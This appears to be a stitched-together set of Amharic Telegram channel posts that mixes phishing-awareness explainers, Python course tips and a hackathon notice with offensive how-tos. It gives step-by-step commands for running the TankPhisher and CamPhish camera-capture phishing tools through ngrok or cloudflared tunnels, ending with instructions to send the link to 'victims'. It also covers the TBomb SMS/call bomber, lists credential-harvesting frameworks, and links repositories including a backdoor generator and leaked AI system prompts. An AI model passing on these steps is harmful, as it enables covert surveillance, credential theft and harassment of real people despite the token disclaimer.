Phishing:
Phishing (ፊሺንግ) ማለት የሳይበር ወንጀለኞች እራሳቸውን ታማኝ ተቋም (ለምሳሌ ባንክ፣ መንግስታዊ ድርጅት፣ የታወቀ ድርጅት) አስመስለው፣ የግል መረጃዎችን (የይለፍ ቃሎች፣ የባንክ ዝርዝሮች፣ የካርድ ቁጥሮች) ለማግኘት የሚሞክሩበት የማታለያ ዘዴ ነው።

እንዴት ይሰራል? ⚠️
በአብዛኛው በኢሜይል፣ በኤስኤምኤስ (Smishing) ወይም በስልክ ጥሪ (Vishing) ይሰራል። አጥቂዎች የሚከተሉትን ዘዴዎች ይጠቀማሉ፦

1. የሐሰት ማንነት: እራሳቸውን ከሚያውቁት ድርጅት ወይም ሰው የመጡ አስመስለው።

2. አስቸኳይነት/ማስፈራሪያ: "አካውንትዎ ሊዘጋ ነው!" ወይም "አስቸኳይ እርምጃ ይውሰዱ!" በማለት ፍርሃት ወይም ግዴታ መፍጠር።

3. የሐሰት ሊንኮች: ወደ ሀሰተኛ ድረ-ገጾች የሚመሩ ሊንኮችን መላክ (ለምሳሌ የባንክ ድረ-ገጽ የሚመስል)።

4. የፊደልና ሰዋስው ስህተት: በፕሮፌሽናል ድርጅቶች መልዕክት ላይ የማይገኙ ስህተቶች።

እራስዎን እንዴት ይጠብቃሉ?

• ሁልጊዜ ያረጋግጡ: ያልተጠበቁ መልዕክቶችን ወይም ሊንኮችን ከመጫንዎ በፊት የላኪውን ማንነት እና የሊንኩን አድራሻ በጥንቃቄ ይፈትሹ።

• መረጃ አይላኩ: የባንክ የይለፍ ቃል፣ የካርድ ቁጥር ወይም ሌላ ሚስጥራዊ መረጃ በኢሜይል፣ በኤስኤምኤስ ወይም በማህበራዊ ሚዲያ በኩል በጭራሽ አይላኩ።

• የአድራሻ አሞሌውን ይመልከቱ: ድረ-ገጽ ሲጎበኙ አድራሻው (URL) ትክክለኛ መሆኑን እና "https://" የሚል መሆኑን ያረጋግጡ።

• Two-Factor Authentication (2FA) ይጠቀሙ: ይህ ለተጨማሪ የደህንነት ሽፋን ትልቅ አስተዋጽኦ ያደርጋል።

• አጠራጣሪ መልዕክቶችን ሪፖርት ያድርጉ: ከተጠራጠሩ ለሚመለከተው አካል (ለምሳሌ ለባንክዎ) ያሳውቁ።

🫡ቀጣይ ደግሞ የ phishing አይነቶች እና እንዴት እንደሚፈፀሙ ይዘን እንመጣለን

Share share share እያደረጋችሁ አብረን ብዙ እንማራለን ብዙ እንሰራለን ብቻ እናንተ active ሁኑ

#Phishing #CyberSecurity #OnlineSafety #CyberAwareness #የሳይበር_ደህንነት #ፊሺንግ #ጥንቃቄ@cipher_atackes

Phishing (ፊሺንግ) እንዴት ይሰራል እና እንዴት ይፈፀማል?

Phishing ማለት የሳይበር ወንጀለኞች ሰዎችን በማታለል ሚስጥራዊ የግል መረጃዎችን (እንደ የይለፍ ቃሎች፣ የባንክ አካውንት ቁጥሮች፣ የክሬዲት ካርድ ዝርዝሮች) ለመስረቅ የሚጠቀሙበት ዘዴ እንደሆነ አይተናል ። አሁን ደግሞ ይህ ሂደት በዋናነት የሚካሄድበትን ደረጃዎች እንይ ፦

1. ማንነት መፍጠር (Impersonation):
* አጥቂዎች ራሳቸውን ታማኝ እና እውቅ አካል አስመስለው ይቀርባሉ። ለምሳሌ፡ ባንክዎ፣ ታዋቂ የቴክኖሎጂ ኩባንያ (Google, Microsoft, Facebook)፣ የመንግስት ተቋም፣ ወይም የሚያውቁት ሰው።
* ይህንን ለማድረግ የድርጅቱን አርማ (logo)፣ ዲዛይን እና የአጻጻፍ ስልት በመጠቀም የሐሰት ኢሜይሎች፣ የኤስኤምኤስ መልዕክቶች ወይም ድረ-ገጾች ይፈጥራሉ።

2. ማጥመጃውን መጣል (Delivery):
* የተፈጠሩትን የሐሰት መልዕክቶች ለብዙ ሰዎች ይልካሉ። ዋናዎቹ የመላኪያ መንገዶች፦
* ኢሜይል: በጣም የተለመደው ዘዴ ነው።
* ኤስኤምኤስ (Smishing): በጽሑፍ መልዕክት የሚላክ ነው።
* ስልክ ጥሪ (Vishing): በስልክ በመደወል የሚፈፀም ነው።
* ማህበራዊ ሚዲያ: በፌስቡክ፣ ቴሌግራም፣ ኢንስታግራም ወዘተ. መልዕክቶች።

3. ማባበያ (Lure/Manipulation):
* መልዕክቱ ተጎጂው በፍጥነት ምላሽ እንዲሰጥ የሚያስገድድ ወይም የሚስብ ይዘት ይኖረዋል። የተለመዱ የማባበያ ዘዴዎች፦
* አስቸኳይነት/ፍርሃት: "አካውንትዎ ሊዘጋ ነው!"፣ "የደህንነት ማስጠንቀቂያ!"፣ "አጠራጣሪ እንቅስቃሴ ታይቷል!" በማለት ፍርሃት ወይም ግዴታ መፍጠር።
* ጥቅም/ሽልማት: "ዕድለኛ አሸናፊ ሆነዋል!"፣ "የግብር ተመላሽ ገንዘብ አለዎት!"
* ጉጉት: "የጥቅልዎ መላኪያ ዝርዝር እዚህ አለ!"፣ "አዲስ የፎቶ አልበም!"
* አገልግሎት: "የይለፍ ቃልዎን ይቀይሩ" ወይም "የአካውንት መረጃዎን ያዘምኑ" በማለት።

4. ማታለያው ወይም trap የምንለው
* መልዕክቱ ተጎጂው አንድ ድርጊት እንዲፈጽም ያበረታታል፦
* ሊንክ መጫን: ወደ ሐሰተኛ ድረ-ገጽ የሚወስድ ሊንክ እንዲጫን። ይህ ድረ-ገጽ ትክክለኛውን ድረ-ገጽ (ለምሳሌ የባንክዎን ገጽ) በትክክል ይመስላል።
* ፋይል ማውረድ: ተንኮል አዘል ፋይል (malicious attachment) እንዲያወርድ።
* መልስ መስጠት: ሚስጥራዊ መረጃዎችን በመልዕክት እንዲልክ።
* በስልክ መናገር: በስልክ ጥሪ ወቅት ሚስጥራዊ መረጃ እንዲናገር (በVishing)።
በ ነገራችን ላይ vphishing የምንለው በ አጭሩ ነው voice phishing ማለት ነው 🫡
5. መረጃ መሰብሰብና መጠቀም (Data Collection & Exploitation):
* ተጎጂው በሐሰተኛው ገጽ ላይ የይለፍ ቃሉን፣ የባንክ ዝርዝሩን ወይም ሌላ ሚስጥራዊ መረጃውን ሲያስገባ አጥቂዎቹ ያንን መረጃ ይሰበስባሉ።
* ይህን የተሰረቀ መረጃ በመጠቀም ወደ ተጎጂው አካውንቶች በመግባት ገንዘብ ይሰርቃሉ፣ የማንነት ስርቆት ይፈጽማሉ፣ ወይም መረጃውን ለሌሎች ወንጀሎች ይሸጣሉ
Next ደግሞ የ phishing አይነቶች ዘርዘር አድርገን እናያለን ባሁኑ ያለቀቅነው መጀምሪያ እውቁት በሚለው ነው
Share share share አድርጉ

Phishing አይነቶች የሚለዩት በዋነኝነት በሚጠቀሙበት የመላኪያ ዘዴ፣ በዒላማቸው እና በሚጠቀሙበት የማታለያ ስልት ነው።

በብዛት ጥቅም ላይ የዋሉ የPhishing አይነቶች:

1. ኢሜይል ፊሺንግ (Email Phishing / Deceptive Phishing):
* ምንድነው? በጣም የተለመደው እና አጠቃላይ የፊሺንግ አይነት ነው። አጥቂዎች ለብዙ ሰዎች የሐሰት ኢሜይሎችን በጅምላ የሚልኩበት ሲሆን፣ መልዕክቶቹም ከታመኑ ድርጅቶች የመጡ ይመስላሉ። ግቡም ተቀባዮች ሊንክ እንዲጫኑ ወይም መረጃ እንዲያስገቡ ማባበል ነው።
* ለምሳሌ: "የባንክ አካውንትዎ ታግዷል፣ እባክዎ እዚህ ሊንክ በመጫን ያረጋግጡ" የሚል የሐሰት የባንክ ኢሜይል መላክ።

2. ስፒር ፊሺንግ (Spear Phishing):
* ምንድነው? ከተለመደው ኢሜይል ፊሺንግ የበለጠ የተጠና እና የተለየ ግለሰብን ወይም ትንሽ ቡድንን ዒላማ ያደረገ ነው። አጥቂዎች ዒላማቸውን በደንብ ያጠናሉ (ለምሳሌ በማህበራዊ ሚዲያ) እና መልዕክቶቹን ግላዊ ያደርጉታል ይህም ይበልጥ እውነተኛ እንዲመስል ያደርገዋል።
* ለምሳሌ: አንድ የኩባንያ ሰራተኛ ከራሱ አለቃ የመጣ የሚመስል ኢሜይል ተቀብሎ ሚስጥራዊ ፋይል እንዲያወርድ ወይም መረጃ እንዲያጋራ ሲጠየቅ።

3. ዌይሊንግ (Whaling):
* ምንድነው? የስፒር ፊሺንግ ንዑስ ክፍል ሲሆን፣ ዒላማው ከፍተኛ የድርጅት ስራ አስፈፃሚዎች (CEO, CFO, ወዘተ.) ወይም ሌሎች ከፍተኛ ባለስልጣናት ናቸው። ግቡም ከፍተኛ መጠን ያለው ገንዘብ ወይም እጅግ ሚስጥራዊ መረጃ ማግኘት ነው።
* ለምሳሌ: የኩባንያው ዋና ስራ አስፈፃሚ (CEO) ከጠበቃው የመጣ የሚመስል ኢሜይል ተቀብሎ አስቸኳይ የገንዘብ ዝውውር እንዲያደርግ ሲጠየቅ።

4. ስሚሺንግ (Smishing / SMS Phishing):
* ምንድነው? በኤስኤምኤስ (የጽሑፍ መልዕክት) የሚፈፀም ፊሺንግ ነው። አጥቂዎች የሐሰት መልዕክቶችን በስልክ ቁጥር በመላክ ተቀባዮች ሊንክ እንዲጫኑ ወይም ስልክ እንዲደውሉ ያበረታታሉ።
* ለምሳሌ: "የጥቅልዎ መላኪያ ችግር ገጥሞታል፣ እባክዎ እዚህ ሊንክ በመጫን ያረጋግጡ" የሚል የሐሰት የመላኪያ ኩባንያ መልዕክት።

5. ቪሺንግ (Vishing / Voice Phishing):
* ምንድነው? በስልክ ጥሪ የሚፈፀም ፊሺንግ ነው። አጥቂዎች ራሳቸውን የባንክ ሰራተኛ፣ የመንግስት አካል ወይም የቴክኒክ ድጋፍ ሰጪ መስለው በመቅረብ ሰዎችን በማታለል ሚስጥራዊ መረጃዎቻቸውን እንዲናገሩ ያደርጋሉ።
* ለምሳሌ: "እኛ ከባንክዎ ነን፣ በአካውንትዎ ላይ አጠራጣሪ እንቅስቃሴ ታይቷል፣ እባክዎ የካርድ ቁጥርዎን እና የይለፍ ቃልዎን ይንገሩን" የሚል ጥሪ።

6. ክሎን ፊሺንግ (Clone Phishing):
* ምንድነው? ከዚህ በፊት የተላከ ትክክለኛ ኢሜይል (ለምሳሌ የባንክ ማስታወቂያ) ቅጂ በመፍጠር፣ በውስጡ ያሉትን ሊንኮች ግን በተንኮል አዘል ሊንኮች በመተካት የሚፈፀም ፊሺንግ ነው። ይህ በጣም አደገኛ ነው ምክንያቱም መልዕክቱ እውነተኛውን ስለሚመስል።
* ለምሳሌ: ከባንክዎ የመጣ እውነተኛ የኢሜይል መግለጫ ቅጂ ወስዶ፣ በውስጡ ያለውን "አካውንትዎን ይመልከቱ" የሚለውን ሊንክ ወደ ሐሰተኛ ድረ-ገጽ የሚመራ ሊንክ መቀየር።

7. ፋርሚንግ (Pharming):
* ምንድነው? ከሌሎቹ ትንሽ የተለየ ነው። ይህ አይነቱ ፊሺንግ የኮምፒዩተርዎን ወይም የኔትወርክዎን ዲኤንኤስ (DNS) ቅንብሮች በማበላሸት፣ ትክክለኛውን ድረ-ገጽ ሊንክ ሲጫኑ እንኳን ወደ ሐሰተኛ ድረ-ገጽ እንዲመሩ የሚያደርግ ዘዴ ነው። ተጎጂው ምንም አይነት አጠራጣሪ ሊንክ ባይጫንም ሊጎዳ ይችላል።
ቀጣይ ደግሞ ከዚህ በፊት የተሰሩ tool አሉ እነሱን እናያለን share አድርጉ

https://t.me/cipher_attacks
https://t.me/cipher_attacks

ፊሺንግ ጥቃቶችን ለመፈፀም በብዛት ጥቅም ላይ የዋሉ መሳሪያዎች (Tools) እና ፍሬምወርኮች ከዚህ በታች ቀርበዋል፡-

1. Zphisher:
*

ምንድን ነው? ይህ ለመጠቀም በጣም ቀላል እና ታዋቂ የሆነ የፊሺንግ ፍሬምወርክ ነው።

* ለምን ጥቅም ላይ ይውላል? በርካታ የታዋቂ ድረ-ገጾች (እንደ Facebook, Google, Instagram, Netflix, ወዘተ) የሐሰት የመግቢያ ገጾች ቴምፕሌቶች (templates) ስላሉት፣ አጥቂዎች በቀላሉ በመምረጥ የፊሺንግ ጥቃቶችን በፍጥነት እንዲጀምሩ ያስችላል። ክሬዴንሻሎችን መሰብሰብ (credential harvesting) ዋና ተግባሩ ነው።

2. Social-Engineer Toolkit (SET):
*

ምንድን ነው? በካሊ ሊኑክስ (Kali Linux) ውስጥ የሚገኝ በጣም ኃይለኛ እና ሁለገብ የማህበራዊ ምህንድስና (Social Engineering) ፍሬምወርክ ነው።

* ለምን ጥቅም ላይ ይውላል? ከፊሺንግ በተጨማሪ ሌሎች የማህበራዊ ምህንድስና ጥቃቶችን (እንደ spear phishing, credential harvester, web attacks, mass mailer, ወዘተ) ማካሄድ ይችላል። ለተራቀቁ የፊሺንግ ዘመቻዎች (campaigns) ያገለግላል።

3. Evilginx2:
*

ምንድን ነው? ይህ በጣም ኃይለኛ እና ዘመናዊ የሆነ "Man-in-the-Middle" (MiTM) ወይም "Reverse Proxy" ፊሺንግ መሳሪያ ነው።

* ለምን ጥቅም ላይ ይውላል? የሁለት ደረጃ ማረጋገጫ (2FA/MFA) ያለባቸውን አካውንቶች ለመጥለፍ የሚያገለግል ነው። Evilginx2 በተጠቂው እና በእውነተኛው ድረ-ገጽ መካከል በመሆን የተጠቂውን ሴሽን ኩኪዎች (session cookies) በመጥለፍ በቀጥታ ወደ አካውንቱ እንዲገቡ ያስችላል (የይለፍ ቃል ሳያስፈልግ)። በጣም አደገኛ ከሆኑ የፊሺንግ መሳሪያዎች አንዱ ነው።

4. Gophish:
* ምንድን ነው? በዋናነት ለቀይ ቡድን (Red Teaming) ስራዎች እና ለሰራተኞች የደህንነት ግንዛቤ ስልጠና (security awareness training) የሚያገለግል ክፍት ምንጭ (open-source) የፊሺንግ ፍሬምወርክ ነው።
* ለምን ጥቅም ላይ ይውላል? የፊሺንግ ዘመቻዎችን (campaigns) ለመቆጣጠር፣ ኢሜይሎችን ለመላክ፣ የመግቢያ ገጾችን ለመፍጠር እና የተጠቂዎችን ምላሽ (ማን ሊንኩን እንደጫነ፣ ማን መረጃ እንዳስገባ) ለመከታተል የሚያስችል አጠቃላይ ዳሽቦርድ አለው።

5. KingPhisher:
* ምንድን ነው?

ከGophish ጋር ተመሳሳይ የሆነ የፊሺንግ ዘመቻዎችን ለመፍጠር እና ለመከታተል የሚያገለግል መሳሪያ ነው።
* ለምን ጥቅም ላይ ይውላል? የፊሺንግ ኢሜይሎችን ለመፍጠር፣ ለመላክ እና የተጠቂዎችን ምላሽ ለመከታተል የተሰራ ነው። ለተራቀቁ እና በትላልቅ የፊሺንግ ዘመቻዎች ያገለግላል።

6. BlackEye:
*

ምንድን ነው? ከZphisher ጋር ተመሳሳይነት ያለው፣ ቀላል የሆኑ የፊሺንግ ገጾችን በፍጥነት ለመፍጠር የሚያገለግል መሳሪያ ነው።

* ለምን ጥቅም ላይ ይውላል? ለፈጣን እና ቀጥተኛ የክሬዴንሻል መሰብሰብ (credential harvesting) ጥቃቶች ተመራጭ ነው።
=Main points

• Ngrok/Serveo/Localtunnel: እነዚህ የፊሺንግ መሳሪያዎች አይደሉም ነገር ግን የፊሺንግ ገጾችን ከLocalhost (ኮምፒውተርዎ) ወደ ኢንተርኔት ለማውጣት የሚያገለግሉ ወሳኝ መሳሪያዎች ናቸው።

• Custom Scripts: አንዳንድ አጥቂዎች በፓይተን (Python)፣ ፒኤችፒ (PHP) ወይም በሌሎች የፕሮግራሚንግ ቋንቋዎች የራሳቸውን የፊሺንግ ስክሪፕቶች ይጽፋሉ።

እነዚህ መሳሪያዎች ለሳይበር ደህንነት ሙከራ (penetration testing) እና ለደህንነት ግንዛቤ ስልጠናዎች (security awareness training) ሊያገለግሉ ቢችሉም፣ በማንኛውም መልኩ ያለ ፈቃድ ለጎጂ ተግባራት መጠቀም ህገወጥ እና ከባድ መዘዝ እንደሚያስከትል ማስታወስ አስፈላጊ ነው።

Share, ማድረግ እንዳይረሳ

👌https://t.me/cipher_attacks
👌https://t.me/cipher_attacks

እንዴት zphisher ን ከ ngrok ጋር እንደምናገናኝ የሰራሁት video ነች እዩት ለ ድምፅ ይቅርታ effect ስለሆነ ነው
Share ማድረግ አትርሱ

👉https://t.me/cipher_attacks
👉https://t.me/cipher_attacks

TankPhisher is a powerful camera and microphone phishing tool designed for educational and testing purposes. This project is currently in development, so there might be some bugs. Stay tuned for future updates!

apt update
apt upgrade
git clone https://github.com/DWIP-BISWAS/TankPhisher

cd TankPhisher

chmod +x ps.sh

Install Cloudflared

Check for latest release in there own repository

pkg install wget
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm
chmod +x cloudflared-linux-arm
mv cloudflared-linux-arm $PREFIX/bin/cloudflared


Run the script

./ps.sh

Obtain the Localhost URL

After running the script, you will receive an HTTP localhost address (e.g., http://127.0.0.1:8080).

Set Up the Cloudflared Tunnel

Open a new Termux session and run the following command:

cloudflared tunnel --url <local_host_url>

Replace <local_host_url> with the localhost address you received earlier (e.g., http://127.0.0.1:8080).

Share the Permanent URL

Once the Cloudflared tunnel is active, you will receive a permanent URL. Share this link with the target.

እስኪ በደንብ ወደስራ እንድንገባ በተቻላችሁ አቅም add members ለማድረግ ሞክሩ በ hacking ዙሪያ እውቀት ላለው ሰው share አድርጉ ምክንያቱም እሱም መቶ እኛ የማናውቀውን ብዙ ነገር ያስተምረናል


Share አድርጉ

ከላይ add members የሚለውን በ መንካትም add አድርጉ

ነገ በ አዲስ ነገር እንመለሳለን


𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks

በብዛት termux root ባያስፈልገውም ነገር ግን አንዳንድ ትልልቅ እና የተወሳሰቡ ስራወችን ለመስራት root access ያስፈልጋል ለዚህም ይሄን መጠቀም ትችላላችሁ
•
ይሄ tool ጥቅሙ ስልካችሁ rooted የሆነ እንዲመስለው ማድረግ ነው ይሄን አብርታችሁ ስትጠቀሙ ብቻ ነው ስትወጡ አብሮ ይጠፋል

apt-get install git -y
git clone https://github.com/adarshaddee/root.git
cd root
chmod +x main
./main

ሁሌ እንደምላችሁ share አድርጉ ቀጣይ የማሳያችሁ እንዴት የሰውን camera በ አንድ link ብቻ 😳 ለዛውም በስልክ 📱 እንደምታነሱ ነው 📸ይሄ ሁሉ ሲሆን የላካቺሁለት ሰው ምንም አያውቅም🤫

ነገር ግን ቢያንስ ቢያንስ 500 መግባት ይኖርብናል ቢቻል ከዛም ይለፈልን
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks

500 members ባንገባም ሁሉም ሰው የሚፈልገው camphish ይሄው 👇👇

apt update && apt upgrade -y 
git clone https://github.com/techchipnet/CamPhish
cd CamPhish
chmod +x camphish.sh
./camphish.sh

`Usage`
1
1
Enter your festivals name
Open new seasson
And back to main directory

cd ~

And start ngrok server with 3333 port

./ngrok http 3333

Now back to seasson 1 and start camphish and
copy direct link

Share to victims


Disclaimer=>This information is solely for the purpose of learning Ethical Hacking and security testing. Always obtain explicit permission from the system owner before conducting any tests. Actions taken without proper authorization can lead to severe legal consequences.


𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks

😱 “I Hacked a Selfie Camera With Just a Phone… You Won’t Believe This!”#...
https://youtube.com/shorts/25s4nXoSI0M?si=dCl1WLXNHkifsjmK

TBomb
TBomb Is A Tool That Can Be Used To Send A Lot Of Anonymous Messages And Calls To Any Person.

pkg update
pkg upgrade -y
pkg install git -y
pkg install python -y
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
bash TBomb.sh

```Single Line Command Installation:
pkg update && pkg upgrade -y && pkg install git -y && pkg install python -y && git clone https://github.com/TheSpeedX/TBomb.git && cd TBomb && bash TBomb.sh`
Usage:
•Type Country Code
•Type Phone Number
•No Of Attempts
•Time Delay
Click On The Link For The Detailed Installation:
https://geek-times.com/how-to-install-call-bomber-in-termux/

Benefits of Penetration testing

(Password Cracking Methods)
የይለፍ ቃል ለመስበር የተለያዩ አውቶማቲክ መሳሪያዎችን (tools) እና ስልቶችን እንጠቀማለን።

መሰረታዊ cracking tools

1.Brute-Force Attack==>
•ይህ ዘዴ ሁሉንም ሊሆኑ የሚችሉ የይለፍ ቃል ጥምረቶችን (combinations) አንድ በአንድ የመሞከር ሂደት ነው። ለምሳሌ፣ "aa", "ab", "ac" እያለ በፊደል፣ በቁጥር እና በልዩ ምልክቶች የሚገኘውን እያንዳንዱን ጥምረት ይሞክራል።
•እንዴት ይሰራል? ጠላፊው ልዩ ሶፍትዌር ተጠቅሞ በቢሊዮኖች የሚቆጠሩ የይለፍ ቃል ጥምረቶችን በሰከንዶች ውስጥ ይሞክራል።
•መከላከል: የይለፍ ቃላችሁ ረጅም እና ውስብስብ ከሆነ፣ ብሩት ፎርስ ጥቃት ለመስበር እጅግ በጣም ብዙ ጊዜ ይወስዳል። ለምሳሌ፣ 8 character ያለው የይለፍ ቃል ለመስበር ሰዓታት ወይም ቀናት ሊወስድ ይችላል፣ 12 character ያለው ግን ለዓመታት ወይም ከዚያ በላይ ሊወስድ ይችላል።

2.Dictionary Attack
ይህ ዘዴ ከብሩት ፎርስ ይለያል። Hackers የተለመዱ ቃላትን፣ ስሞችን፣ የ ትውልድ ቀናትን እና ሌሎች በተደጋጋሚ ጥቅም ላይ የሚውሉ የይለፍ ቃላትን የያዘ መዝገበ ቃላት(dictionary) ይጠቀማል።
•አሰራር? ሶፍትዌሩ በመዝገበ ቃላቱ ውስጥ ያሉትን ቃላት በሙሉ እንደ የይለፍ ቃል ይሞክራል። ብዙ ሰዎች እንደ "password"፣ "123456"፣ "qwerty"፣ "iloveyou" ወይም የልጆቻቸውን ስም ስለሚጠቀሙ ይህ ዘዴ በጣም ውጤታማ እንዲሆን ያደርገዋል።
•መከላከል: በመዝገበ ቃላት ውስጥ የሚገኙ ቃላትን ወይም ቀላል የቁጥር ቅደም ተከተሎችን እንደ የይለፍ ቃል ከመጠቀም መቆጠብ ብቸኛው መፍትሄ ነው ።
Check my password ያሉ website በ መግባት ማረጋገጥ ትችላላችሁ

ማሳሰቢያ=>>ይለፍ ካላችሁን check በ ምታደርጉ ሰዓት አንዳንድ ፊደላትን ለመቀየር ሞክሩ ይሄ ለደህንነታችሁ በጣም ወሳኝ ነው


𝗦𝗵𝗮𝗿𝗲=>>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>>https://t.me/cipher_communitys

ይወዳደሩ ... ያሸንፉ... ይሸለሙ
ልዩ የሃካቶን ውድድር ጥሪ

ጷጉሜን 5/2017 ዓ.ም በሀገር አቀፍ ደረጃ የሚከበረውን “የነገ ቀን” ምክንያት በማድረግ ኢትዮጵያውያን ታዳጊ ወጣቶች፣ የሶፍትዌር አልሚዎች፣ ኮደሮች፣ የኮምፒዩተር ፕሮግራመሮች እና ፍላጎት ያላቸው ዓካላት በሙሉ በ"የነገዋ ኢትዮጵያ ሃካቶን ውድድር" ላይ እንዲሳተፉ ግብዣ ቀርቧል።
የነገዋ ኢትዮጵያ ሃካቶን ውድድር ለ48 ሰዓት በኢትዮጵያ ኢንፎርሜሽን ቴክኖሎጂ ፓርክ (IT Park) በሚገኘው Innobiz-K Ethiopia ኢንኩቤሽን ማዕከል የሚከናወን ሲሆን፤ የመዝጊያ እና የሽልማት መርሃ-ግብሩ ቋጉሜ 5 ቀን 2017 ዓ.ም በሳይንስ ሙዚዬም ይካሄዳል።
ይህ ልዩ የአዲስ ዓመት ፕሮግራም፤ ግብርናን፣ ኢንዱስትሪን እና የመንግስት አገልግሎት አሰጣጥን ዲጂታል ለማድረግ ያለመ ነው።
የመመዝገቢያው ቀን እስከ ነሐሴ 28 ቀን 2017 ዓ.ም ሲሆን፤ ለመመዝገብ QR ኮዱን ስካን በማድረግ ወይም ከዚህ በታች ባለው ማስፈንጠሪያ መመዝገብ ይችላሉ፡፡

https://docs.google.com/.../1FAIpQLSdKLtrK8XQLfx.../viewform

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks

ይሄ app የ nmap አጫጫን command ከነ ማብራሪያው ከነ አጠቃቀም የያዘ ነው እኔ በብዛት ለ አንዳንድ ሙከራዎች እጠቀመዋለሁ እናንተም አውርዳችሁ መጠቀም ትችላላችሁ ::

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks

python course የምትወስዱባቸው እና certificate ለማግኘት የሚጠቅሟቹ ቦታዎች
coursia
Python for Everybody Specialization by University of Michigan. በ Dr. charles rasel and Dr. Chuck የሚሰጥ ኮርስ ነው for beginners በጣም አሪፍ ቦታ ነው. ነገር ግን certificate የምትፈልጉ ከሆነ ክፍያ ያስፈልገዋል ኮርሱን ብቻ ከሆነ ግን የምትፈልጉት ነጻ ነው::ደግሞ ከዜሮ ተነስቶ እስከ database ድረስ ያስተምራል
freeCodeCamp
ይሄም በተመሳሳይ ሙሉ በሙሉ free ነው.
አሪፍ አሪፍ python course በ video እና በ ፅሁፍ ያቀርባል።
እና ደግሞ youtube ላይ እራሱ learn python-full course for beginners የሚል በጣም ታዋቂ video አላቸው።
udemy
እዚህ ላይ ብዙ ኮርሶች ማግኘት ይቻላል።ለምሳሌ
==>100 days of code - the complate python pro bootcamp for 2024
==>complate python developer in 2024 / zero to master
የሚሉ ታዋቂ course አላቸው ። እነዚህ ቅናሽ አላቸው::
=>Codecademy
ይሄን ለየት የሚያደርገው (interactive)የሆነ መማሪያ መንገድ አለው።እዛው ላይ ውጤቱን በማየት መማር ትችላላችሁ. free አማራጭም አሉት::
#ይቀጥላል

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks

ሌሎች ደግሞ
°HackerRank / leetCode
challenge የምትዎዱ የተለያዩ challenge በመፍታት ችሎታ ለማዳበር አሪፍ ነው።
Exercism
እዚህ ላይ code ከፃፋቹ በሁአላ በተለያዩ ልምድ ባላቸው programer ሮች ማስፈተሽ ትችላላችሁ
Replit
online IDE ሲሆን python code ለመፃፍ ፕሮጀክት ለመስራት አሪፍ ነው
==>book
•Automate the Boring Stuff with Python
•Python Crash Course
==>በ video መልክ ከሆነ የሚመቻችሁ
•http://freeCodeCamp.org ከላይ ያለው ነው
•Corey Schafer
•Mosh Hamedani
ይሄ ለጀማሪ recommended አደርጋለሁ እኔ እየተማርኩ ያለሁት በዚህ ነው 6 ሰዓት video youtube ላይ አለው እና ለጀማሪ በደንብ ትምህርት የሚያስጨብጥ ሰውዬ ነው
==>ሌሎች
•reddit
r/learnpython, r/python
•github
የሌላ ሰው ፕሮግራም ለማጥናት

==>ባጠቃላይ ጀማሪ ከሆናችሁ recommed የተደረጉት
coursea or free code camp ናቸው
እኔ በግሌ ግን የ mosh ን video በደንብ እዩት.

ስትማሩ more practical ለመሆን ምክሩ
ከላይ ያሉት ለ python ጀማሪዎች አሪፍ ናቸው ለጀማሪ ብቻ ሳይሆን ለሚያቁትም አሪፍ ናቸው

የኖረ ሕልማዊ እንቆቅልሽ ተፈታ፤ የዛሬ የመቻል እውነታችን ተገለጠ፤ የነገ ትውልድ ተስፋ በአብርኾት ፈነጠቀ!

data:
- name: "The Book of Secret Knowledge"
url: "https://github.com/trimstray/the-book-of-secret-knowledge"
description: "A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more."
stars: 185432
topics: ["awesome-list", "hacking", "security"]
- name: "funNLP"
url: "https://github.com/fighting41love/funNLP"
description: "NLP, text mining, and data processing resources."
stars: 75916
topics: ["nlp", "text-mining", "hacking"]
- name: "Hacking Tool"
url: "https://github.com/Z4nzu/hackingtool"
description: "ALL IN ONE Hacking Tool For Hackers."
stars: 53515
topics: ["allinonehackingtool", "hacking", "linux"]
- name: "Tools of The Trade"
url: "https://github.com/cjbarber/ToolsOfTheTrade"
description: "Tools of The Trade, from Hacker News."
stars: 16828
topics: ["tools", "hacking"]
- name: "Awesome Hacking"
url: "https://github.com/carpedm20/awesome-hacking"
description: "A curated list of awesome Hacking tutorials, tools and resources."
stars: 14709
topics: ["awesome", "hacking", "pentesting"]
- name: "Hacker Roadmap"
url: "https://github.com/sundowndev/hacker-roadmap"
description: "A collection of hacking tools, resources and references to practice ethical hacking."
stars: 14534
topics: ["hacking", "pentesting", "security"]
- name: "Subfinder"
url: "https://github.com/projectdiscovery/subfinder"
description: "Fast passive subdomain enumeration tool."
stars: 12251
topics: ["osint", "hacking", "subdomains"]
- name: "fsociety"
url: "https://github.com/Manisso/fsociety"
description: "FSOCiety Hacking Tools Pack – A Penetration Testing Framework."
stars: 11477
topics: ["hacking", "pentest", "tools"]
- name: "Osintgram"
url: "https://github.com/Datalux/Osintgram"
description: "OSINT tool for Instagram account analysis."
stars: 11321
topics: ["osint", "hacking", "instagram"]
- name: "TheFatRat"
url: "https://github.com/screetsec/TheFatRat"
description: "Tool to generate backdoor and post exploitation attack."
stars: 10540
topics: ["hacking", "backdoor", "tool"]
- name: "CL4R1T4S"
url: "https://github.com/elder-plinius/CL4R1T4S"
description: "LEAKED SYSTEM PROMPTS FOR VARIOUS AI SYSTEMS."
stars: 9889
topics: ["hacking", "red-team", "transparency"]
- name: "Red-Teaming-Toolkit"
url: "https://github.com/infosecn1nja/Red-Teaming-Toolkit"
description: "Cutting-edge open-source security tools for red teamers."
stars: 9783
topics: ["hacking", "red-team", "security"]
- name: "trape"
url: "https://github.com/jofpin/trape"
description: "People tracker on the Internet: OSINT analysis and research tool."
stars: 8455
topics: ["osint", "hacking", "tracking"]
